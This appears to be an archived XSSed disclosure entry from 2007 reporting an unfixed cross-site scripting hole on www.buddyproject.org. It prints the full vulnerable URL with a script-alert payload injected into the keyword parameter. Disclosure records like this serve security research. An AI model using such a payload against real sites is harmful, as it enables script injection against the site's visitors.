Unfixed XSS vulnerability at www.buddyproject.org

2007-02-07T00:00:00
ID XSSED:11401
Type xssed
Reporter CoNqUeRoR
Modified 2007-03-07T00:00:00

Description

Security researcher CoNqUeRoR submitted a cross-site scripting (XSS) vulnerability affecting www.buddyproject.org on 02/07/2007. At the time of submission, the site ranked 1078061 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/07/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.buddyproject.org/capers/default.asp?type=advanced&txtgrade=&txttopic=&keyword="<script>alert("HACKED")</script>&btnSubmit.x=0&btnSubmit.y=0&grade=&topicx=Computer+Drawing&topicx=Database&topicx=Fall+Holidays&topicx=Family+Involvement&topicx=Fine+Arts&topicx=Language+Arts&topicx=Mathematics&topicx=Multi-media&topicx=Patriotism&topicx=Science&topicx=Social+Studies&topicx=Spreadsheet%2FGraphs&topicx=Spring+Holidays&topicx=Summer+Holidays&topicx=Winter+Holidays&topicx=Word+Processing&norecs=True